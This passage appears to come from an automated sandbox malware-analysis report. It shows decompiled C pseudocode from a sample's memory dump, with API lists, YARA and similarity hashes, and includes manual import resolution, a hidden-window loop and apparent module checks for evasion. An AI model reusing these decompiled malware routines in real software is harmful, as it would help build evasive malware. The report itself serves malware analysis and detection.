                                                                                                                                                                                                								_v64 = _v64 & 0x00000000;
                                                                                                                                                                                                								_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                								if(( *_v12 & _v56) == 0) {
                                                                                                                                                                                                									_v60 =  *_v12 + _a4;
                                                                                                                                                                                                									_v20 = _v60 + 2;
                                                                                                                                                                                                									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                                                                                                                                                                                                									_v16 = _v40(_v36, _v20);
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									_v24 =  *_v12;
                                                                                                                                                                                                									_v20 = _v24 & 0x0000ffff;
                                                                                                                                                                                                									_v16 = _v40(_v36, _v20);
                                                                                                                                                                                                								}
                                                                                                                                                                                                								if(_v24 != _v16) {
                                                                                                                                                                                                									_v44 = _v44 + 1;
                                                                                                                                                                                                									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                                                                                                                                                										 *_v12 = _v16;
                                                                                                                                                                                                									} else {
                                                                                                                                                                                                										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                                                                                                                                                                                                									}
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_v12 =  &(_v12[1]);
                                                                                                                                                                                                								_v28 = _v28 + 4;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_v8 = _v8 + 0x14;
                                                                                                                                                                                                							continue;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t163 = 0xfffffffd;
                                                                                                                                                                                                						return _t163;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L24;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return __eax | 0xffffffff;
                                                                                                                                                                                                			}























                                                                                                                                                                                                0x00b02655
                                                                                                                                                                                                0x00b02664
                                                                                                                                                                                                0x00b02664
                                                                                                                                                                                                0x00b02653
                                                                                                                                                                                                0x00b02677
                                                                                                                                                                                                0x00b02680
                                                                                                                                                                                                0x00b02680
                                                                                                                                                                                                0x00b0268e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b0268e
                                                                                                                                                                                                0x00b0259a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b0259a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02572
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00B024F0
                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(00000000), ref: 00B02589
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                                                • API String ID: 4133054770-1584408056
                                                                                                                                                                                                • Opcode ID: 0915e2cbd48a03727f354c2f3053bcce77caa1d2aad14a585f9c793942443fa7
                                                                                                                                                                                                • Instruction ID: 77dd3a25f8375a3fbb5e0db8d98a51139afcc509aff08d7853f1056f0787c5b0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0915e2cbd48a03727f354c2f3053bcce77caa1d2aad14a585f9c793942443fa7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E616B75D00209EFDB00CF98C989BADBBF1FF08315F248599E815AB2A1D774AA84DF54
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF2ECD(void* __eflags) {
                                                                                                                                                                                                				struct _WNDCLASSEXA _v52;
                                                                                                                                                                                                				char _v80;
                                                                                                                                                                                                				char _v144;
                                                                                                                                                                                                				intOrPtr _t25;
                                                                                                                                                                                                				struct HWND__* _t34;
                                                                                                                                                                                                				intOrPtr _t36;
                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                				struct HWND__* _t44;
                                                                                                                                                                                                				intOrPtr _t45;
                                                                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                				intOrPtr _t53;
                                                                                                                                                                                                				intOrPtr _t56;
                                                                                                                                                                                                				intOrPtr _t59;
                                                                                                                                                                                                				struct HINSTANCE__* _t64;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t25 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
                                                                                                                                                                                                				memset( &_v52, 0, 0x30);
                                                                                                                                                                                                				_t59 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                				E00AF900E(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
                                                                                                                                                                                                				_v52.style = 3;
                                                                                                                                                                                                				_v52.cbSize = 0x30;
                                                                                                                                                                                                				_v52.lpszClassName =  &_v144;
                                                                                                                                                                                                				_v52.lpfnWndProc = E00AF2E6A;
                                                                                                                                                                                                				_v52.hInstance = _t64;
                                                                                                                                                                                                				if(RegisterClassExA( &_v52) == 0) {
                                                                                                                                                                                                					L6:
                                                                                                                                                                                                					_t34 =  *0xb0e718; // 0x50482
                                                                                                                                                                                                					if(_t34 != 0) {
                                                                                                                                                                                                						_t39 =  *0xb0e694; // 0x4d3f820
                                                                                                                                                                                                						 *((intOrPtr*)(_t39 + 0x28))(_t34);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					L8:
                                                                                                                                                                                                					_t36 =  *0xb0e694; // 0x4d3f820
                                                                                                                                                                                                					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
                                                                                                                                                                                                				 *0xb0e718 = _t44;
                                                                                                                                                                                                				if(_t44 == 0) {
                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t45 =  *0xb0e694; // 0x4d3f820, executed
                                                                                                                                                                                                				 *((intOrPtr*)(_t45 + 0x14))(_t44, 0);
                                                                                                                                                                                                				_t47 =  *0xb0e694; // 0x4d3f820
                                                                                                                                                                                                				 *((intOrPtr*)(_t47 + 0x18))( *0xb0e718);
                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                					_t50 =  *0xb0e694; // 0x4d3f820
                                                                                                                                                                                                					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
                                                                                                                                                                                                					if(_t51 == 0) {
                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if(_t51 == 0xffffffff) {
                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t53 =  *0xb0e694; // 0x4d3f820
                                                                                                                                                                                                					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
                                                                                                                                                                                                					_t56 =  *0xb0e694; // 0x4d3f820
                                                                                                                                                                                                					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				goto L6;
                                                                                                                                                                                                			}




















                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00AF2EEC
                                                                                                                                                                                                • RegisterClassExA.USER32(00000030), ref: 00AF2F3D
                                                                                                                                                                                                • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00AF2F6A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ClassCreateRegisterWindowmemset
                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                • API String ID: 2030675355-4108050209
                                                                                                                                                                                                • Opcode ID: 1367eb59fd0d63a8f683e3326ccb8658a7316dfe64955d6457b8ff7c2897253a
                                                                                                                                                                                                • Instruction ID: d02d743790c3eefa8a47e205e295c5f9e09cd46c7006477064fd253a6d88b4c1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1367eb59fd0d63a8f683e3326ccb8658a7316dfe64955d6457b8ff7c2897253a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1831E6B1510108AFE704DFA8ED89FAA7BBCEB28344F004565B629D71A1DF31DD45CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                                                                			E00AF4D60(intOrPtr* __ecx, void* __edx, void* __fp0) {
                                                                                                                                                                                                				char _v516;
                                                                                                                                                                                                				char _v556;
                                                                                                                                                                                                				char _v564;
                                                                                                                                                                                                				char _v568;
                                                                                                                                                                                                				char _v572;
                                                                                                                                                                                                				char _v576;
                                                                                                                                                                                                				intOrPtr _v580;
                                                                                                                                                                                                				char _v588;
                                                                                                                                                                                                				signed int _v596;
                                                                                                                                                                                                				intOrPtr _v602;
                                                                                                                                                                                                				intOrPtr _v604;
                                                                                                                                                                                                				char _v608;
                                                                                                                                                                                                				CHAR* _v612;
                                                                                                                                                                                                				CHAR* _v616;
                                                                                                                                                                                                				signed int _v620;
                                                                                                                                                                                                				signed int _v624;
                                                                                                                                                                                                				signed int _v628;
                                                                                                                                                                                                				signed int _v632;
                                                                                                                                                                                                				char _v636;
                                                                                                                                                                                                				intOrPtr _t119;
                                                                                                                                                                                                				void* _t120;
                                                                                                                                                                                                				signed int _t122;
                                                                                                                                                                                                				CHAR* _t124;
                                                                                                                                                                                                				intOrPtr _t125;
                                                                                                                                                                                                				CHAR* _t127;
                                                                                                                                                                                                				WCHAR* _t130;
                                                                                                                                                                                                				intOrPtr _t133;
                                                                                                                                                                                                				intOrPtr _t137;
                                                                                                                                                                                                				WCHAR* _t138;
                                                                                                                                                                                                				intOrPtr _t142;
                                                                                                                                                                                                				WCHAR* _t143;
                                                                                                                                                                                                				CHAR* _t144;
                                                                                                                                                                                                				intOrPtr _t145;
                                                                                                                                                                                                				intOrPtr _t150;
                                                                                                                                                                                                				intOrPtr _t153;
                                                                                                                                                                                                				WCHAR* _t154;
                                                                                                                                                                                                				signed int _t159;
                                                                                                                                                                                                				WCHAR* _t160;
                                                                                                                                                                                                				intOrPtr _t163;
                                                                                                                                                                                                				intOrPtr _t165;
                                                                                                                                                                                                				intOrPtr _t166;
                                                                                                                                                                                                				intOrPtr _t170;
                                                                                                                                                                                                				signed int _t173;
                                                                                                                                                                                                				signed int _t178;
                                                                                                                                                                                                				intOrPtr _t182;
                                                                                                                                                                                                				WCHAR* _t184;
                                                                                                                                                                                                				WCHAR* _t185;
                                                                                                                                                                                                				char _t186;
                                                                                                                                                                                                				WCHAR* _t188;
                                                                                                                                                                                                				intOrPtr _t200;
                                                                                                                                                                                                				intOrPtr _t211;
                                                                                                                                                                                                				signed int _t215;
                                                                                                                                                                                                				char _t220;
                                                                                                                                                                                                				WCHAR* _t231;
                                                                                                                                                                                                				intOrPtr _t235;
                                                                                                                                                                                                				intOrPtr _t238;
                                                                                                                                                                                                				intOrPtr _t239;
                                                                                                                                                                                                				intOrPtr _t246;
                                                                                                                                                                                                				signed int _t248;
                                                                                                                                                                                                				WCHAR* _t249;
                                                                                                                                                                                                				CHAR* _t250;
                                                                                                                                                                                                				intOrPtr _t262;
                                                                                                                                                                                                				void* _t271;
                                                                                                                                                                                                				intOrPtr _t272;
                                                                                                                                                                                                				signed int _t277;
                                                                                                                                                                                                				void* _t278;
                                                                                                                                                                                                				intOrPtr _t280;
                                                                                                                                                                                                				signed int _t282;
                                                                                                                                                                                                				void* _t298;
                                                                                                                                                                                                				void* _t299;
                                                                                                                                                                                                				intOrPtr _t305;
                                                                                                                                                                                                				CHAR* _t326;
                                                                                                                                                                                                				void* _t328;
                                                                                                                                                                                                				WCHAR* _t329;
                                                                                                                                                                                                				intOrPtr _t331;
                                                                                                                                                                                                				WCHAR* _t333;
                                                                                                                                                                                                				signed int _t335;
                                                                                                                                                                                                				intOrPtr* _t337;
                                                                                                                                                                                                				void* _t338;
                                                                                                                                                                                                				void* _t339;
                                                                                                                                                                                                				void* _t353;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t353 = __fp0;
                                                                                                                                                                                                				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                                                                                                                                                                                                				_t119 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                				_v620 = _v620 & 0x00000000;
                                                                                                                                                                                                				_t328 = __ecx;
                                                                                                                                                                                                				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                                                                                                                                                                                                					L7:
                                                                                                                                                                                                					_t120 = E00AFB7EA(0xb0b9c4,  &_v516); // executed
                                                                                                                                                                                                					_t14 = _t120 + 1; // 0x1
                                                                                                                                                                                                					E00AFA8AF( &_v556, _t14, _t351);
                                                                                                                                                                                                					_t298 = 0x64;
                                                                                                                                                                                                					_t122 = E00AFA4B3( &_v556, _t298);
                                                                                                                                                                                                					 *0xb0e748 = _t122;
                                                                                                                                                                                                					if(_t122 != 0) {
                                                                                                                                                                                                						_push(0x4e5);
                                                                                                                                                                                                						_t299 = 0x10;
                                                                                                                                                                                                						 *0xb0e680 = E00AFE1FE(0xb0b9c8, _t299);
                                                                                                                                                                                                						 *_t337 = 0x610;
                                                                                                                                                                                                						_t124 = E00AF95C2(0xb0b9c8);
                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                						_push(_t124);
                                                                                                                                                                                                						_v612 = _t124;
                                                                                                                                                                                                						_t125 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                						_t127 = E00AF92C6(_t125 + 0x228);
                                                                                                                                                                                                						_t338 = _t337 + 0xc;
                                                                                                                                                                                                						_v616 = _t127;
                                                                                                                                                                                                						E00AF85B6( &_v612);
                                                                                                                                                                                                						_t130 = E00AFB2AB(_t127);
                                                                                                                                                                                                						_t246 = 3;
                                                                                                                                                                                                						__eflags = _t130;
                                                                                                                                                                                                						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E00AF85FB( &_v616, 0xfffffffe);
						_t133 =  *0xb0e688; // 0xb20000
						_t22 = _t133 + 0x114; // 0xb20114
						E00AF49FE( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0xb0e688; // 0xb20000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0xb0e680; // 0x4d3fb78
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E00AFE308(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0xb0e6b4; // 0x4d3f870
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E00AFE308(_t353,  &_v588);
								_t235 =  *0xb0e6b4; // 0x4d3f870
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0xb0e73c;
							if( *0xb0e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0xb0e680; // 0x4d3fb78
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0xb0e688; // 0xb20000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E00AF4998();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0xb0e684; // 0x4d3f6c8
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0xb0e688; // 0xb20000
											_t184 = E00AFFC57(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0); // executed
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t185 = E00AF85E5(0x1000); // executed
												_t333 = _t185;
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E00AF109A(_t262, 0x148);
													_t305 =  *0xb0e688; // 0xb20000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E00AF900E(_t271,  &_v572);
													_t272 =  *0xb0e688; // 0xb20000
													_t188 = E00AF60C0( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0xb0e688; // 0xb20000
														__eflags = _t200 + 0x1020;
														E00AF9621(_t333, 0x1000, _v636, _t200 + 0x1020);
														E00AF85B6( &_v636);
														E00AFA953(_t333, 0, 0xbb8, 1); // executed
														E00AF85FB( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E00AF85FB( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E00AF4998();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0xb0e684; // 0x4d3f6c8
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E00AF85E5(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E00AF95C2(_t278, 0x32d);
										_t280 =  *0xb0e688; // 0xb20000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E00AF9621(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E00AF85B6( &_v636);
										E00AFA953(_t249, 0, 0xbb8, 1);
										E00AF85FB( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
                                                                                                                                                                                                							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                                                                                                                                                                                                							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                                                                                                                                                                                                								L36:
                                                                                                                                                                                                								_t144 = E00AF95C2(_t262, 0x610);
                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                								_push(_t144);
                                                                                                                                                                                                								_v616 = _t144;
                                                                                                                                                                                                								_t145 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                								_t329 = E00AF92C6(_t145 + 0x228);
                                                                                                                                                                                                								_v612 = _t329;
                                                                                                                                                                                                								__eflags = _t329;
                                                                                                                                                                                                								if(_t329 != 0) {
                                                                                                                                                                                                									_t160 = E00AFB2AB(_t329);
                                                                                                                                                                                                									__eflags = _t160;
                                                                                                                                                                                                									if(_t160 != 0) {
                                                                                                                                                                                                										_t163 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                                                                                                                                                                                                									}
                                                                                                                                                                                                									E00AF85FB( &_v612, 0xfffffffe);
                                                                                                                                                                                                								}
                                                                                                                                                                                                								E00AF85B6( &_v616);
                                                                                                                                                                                                								_t150 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                								lstrcpynW(_t150 + 0x438,  *0xb0e740, 0x105);
                                                                                                                                                                                                								_t153 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                								_t154 = _t153 + 0x228;
                                                                                                                                                                                                								__eflags = _t154;
                                                                                                                                                                                                								lstrcpynW(_t154,  *0xb0e738, 0x105);
                                                                                                                                                                                                								_t331 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                								_t117 = _t331 + 0x228; // 0xb20228
                                                                                                                                                                                                								 *((intOrPtr*)(_t331 + 0x434)) = E00AF8F9F(_t117, __eflags);
                                                                                                                                                                                                								E00AF85FB(0xb0e740, 0xfffffffe);
                                                                                                                                                                                                								E00AF85FB(0xb0e738, 0xfffffffe);
                                                                                                                                                                                                								L41:
                                                                                                                                                                                                								_t159 = 0;
                                                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                                                								L42:
                                                                                                                                                                                                								return _t159;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							__eflags = _t238 - 2;
                                                                                                                                                                                                							if(_t238 != 2) {
                                                                                                                                                                                                								goto L36;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							goto L17;
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					L8:
                                                                                                                                                                                                					_t159 = _t122 | 0xffffffff;
                                                                                                                                                                                                					goto L42;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t250 = E00AF95A8(0x6e2);
                                                                                                                                                                                                				_v616 = _t250;
                                                                                                                                                                                                				_t326 = E00AF95A8(0x9f5);
                                                                                                                                                                                                				_v612 = _t326;
                                                                                                                                                                                                				if(_t250 != 0 && _t326 != 0) {
                                                                                                                                                                                                					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                                                                                                                                                                                                						_v620 = 1;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					E00AF85A3( &_v616);
                                                                                                                                                                                                					_t122 = E00AF85A3( &_v612);
                                                                                                                                                                                                					_t351 = _v620;
                                                                                                                                                                                                					if(_v620 != 0) {
                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}

                                                                                                                                                                                                0x00af4f9c
                                                                                                                                                                                                0x00af4fa0
                                                                                                                                                                                                0x00af5075
                                                                                                                                                                                                0x00af507b
                                                                                                                                                                                                0x00af5081
                                                                                                                                                                                                0x00af508c
                                                                                                                                                                                                0x00af508d
                                                                                                                                                                                                0x00af508e
                                                                                                                                                                                                0x00af508f
                                                                                                                                                                                                0x00af5095
                                                                                                                                                                                                0x00af509a
                                                                                                                                                                                                0x00af50a0
                                                                                                                                                                                                0x00af50a8
                                                                                                                                                                                                0x00af50ae
                                                                                                                                                                                                0x00af50b1
                                                                                                                                                                                                0x00af50c0
                                                                                                                                                                                                0x00af50c7
                                                                                                                                                                                                0x00af50ca
                                                                                                                                                                                                0x00af50d7
                                                                                                                                                                                                0x00af50db
                                                                                                                                                                                                0x00af50e8
                                                                                                                                                                                                0x00af50ed
                                                                                                                                                                                                0x00af50f0
                                                                                                                                                                                                0x00af50f2
                                                                                                                                                                                                0x00af50fe
                                                                                                                                                                                                0x00af5103
                                                                                                                                                                                                0x00af5105
                                                                                                                                                                                                0x00af5109
                                                                                                                                                                                                0x00af510a
                                                                                                                                                                                                0x00af510c
                                                                                                                                                                                                0x00af5117
                                                                                                                                                                                                0x00af511c
                                                                                                                                                                                                0x00af5129
                                                                                                                                                                                                0x00af512d
                                                                                                                                                                                                0x00af512e
                                                                                                                                                                                                0x00af5130
                                                                                                                                                                                                0x00af5138
                                                                                                                                                                                                0x00af5139
                                                                                                                                                                                                0x00af513e
                                                                                                                                                                                                0x00af5156
                                                                                                                                                                                                0x00af515b
                                                                                                                                                                                                0x00af515e
                                                                                                                                                                                                0x00af5162
                                                                                                                                                                                                0x00af5164
                                                                                                                                                                                                0x00af5177
                                                                                                                                                                                                0x00af5181
                                                                                                                                                                                                0x00af5185
                                                                                                                                                                                                0x00af518d
                                                                                                                                                                                                0x00af518e
                                                                                                                                                                                                0x00af5196
                                                                                                                                                                                                0x00af5197
                                                                                                                                                                                                0x00af519c
                                                                                                                                                                                                0x00af51a8
                                                                                                                                                                                                0x00af51b2
                                                                                                                                                                                                0x00af51c4
                                                                                                                                                                                                0x00af51d0
                                                                                                                                                                                                0x00af51d5
                                                                                                                                                                                                0x00af51d5
                                                                                                                                                                                                0x00af51df
                                                                                                                                                                                                0x00af51e5
                                                                                                                                                                                                0x00af51e5
                                                                                                                                                                                                0x00af510c
                                                                                                                                                                                                0x00af50f2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af507b
                                                                                                                                                                                                0x00af4fa6
                                                                                                                                                                                                0x00af4fa9
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4faf
                                                                                                                                                                                                0x00af4fba
                                                                                                                                                                                                0x00af4fbb
                                                                                                                                                                                                0x00af4fbc
                                                                                                                                                                                                0x00af4fbd
                                                                                                                                                                                                0x00af4fc3
                                                                                                                                                                                                0x00af4fc8
                                                                                                                                                                                                0x00af4fdc
                                                                                                                                                                                                0x00af4fe1
                                                                                                                                                                                                0x00af4fe5
                                                                                                                                                                                                0x00af4ff0
                                                                                                                                                                                                0x00af4ff9
                                                                                                                                                                                                0x00af4ffb
                                                                                                                                                                                                0x00af4fff
                                                                                                                                                                                                0x00af5000
                                                                                                                                                                                                0x00af5002
                                                                                                                                                                                                0x00af500d
                                                                                                                                                                                                0x00af5013
                                                                                                                                                                                                0x00af5025
                                                                                                                                                                                                0x00af5028
                                                                                                                                                                                                0x00af502b
                                                                                                                                                                                                0x00af5038
                                                                                                                                                                                                0x00af5040
                                                                                                                                                                                                0x00af504a
                                                                                                                                                                                                0x00af505c
                                                                                                                                                                                                0x00af5068
                                                                                                                                                                                                0x00af506d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af5002
                                                                                                                                                                                                0x00af4f96
                                                                                                                                                                                                0x00af4ece
                                                                                                                                                                                                0x00af4ece
                                                                                                                                                                                                0x00af4ed4
                                                                                                                                                                                                0x00af4ed6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4ed8
                                                                                                                                                                                                0x00af4edc
                                                                                                                                                                                                0x00af51e6
                                                                                                                                                                                                0x00af51eb
                                                                                                                                                                                                0x00af51f1
                                                                                                                                                                                                0x00af51f3
                                                                                                                                                                                                0x00af51f4
                                                                                                                                                                                                0x00af51f8
                                                                                                                                                                                                0x00af5208
                                                                                                                                                                                                0x00af520d
                                                                                                                                                                                                0x00af5211
                                                                                                                                                                                                0x00af5213
                                                                                                                                                                                                0x00af5217
                                                                                                                                                                                                0x00af521c
                                                                                                                                                                                                0x00af521e
                                                                                                                                                                                                0x00af5220
                                                                                                                                                                                                0x00af5226
                                                                                                                                                                                                0x00af5226
                                                                                                                                                                                                0x00af5233
                                                                                                                                                                                                0x00af5239
                                                                                                                                                                                                0x00af523f
                                                                                                                                                                                                0x00af5244
                                                                                                                                                                                                0x00af5262
                                                                                                                                                                                                0x00af5264
                                                                                                                                                                                                0x00af5270
                                                                                                                                                                                                0x00af5270
                                                                                                                                                                                                0x00af5276
                                                                                                                                                                                                0x00af5278
                                                                                                                                                                                                0x00af527e
                                                                                                                                                                                                0x00af5290
                                                                                                                                                                                                0x00af5296
                                                                                                                                                                                                0x00af52a2
                                                                                                                                                                                                0x00af52aa

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00AF4DB3
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00AF4DBA
                                                                                                                                                                                                • lstrcpynW.KERNEL32(00B1FBC8,00000105), ref: 00AF5262
                                                                                                                                                                                                • lstrcpynW.KERNEL32(00B1FDD8,00000105), ref: 00AF5276
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModulelstrcpyn
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3430401031-0
                                                                                                                                                                                                • Opcode ID: ab5dc4543ee3d12507d712e6472f86243a0bd927834b6c76241f75fa856933fb
                                                                                                                                                                                                • Instruction ID: dffedda82e67c3edb5b259b6fd2102c3e0fb9d93b7c0260b1de3310b905e133a
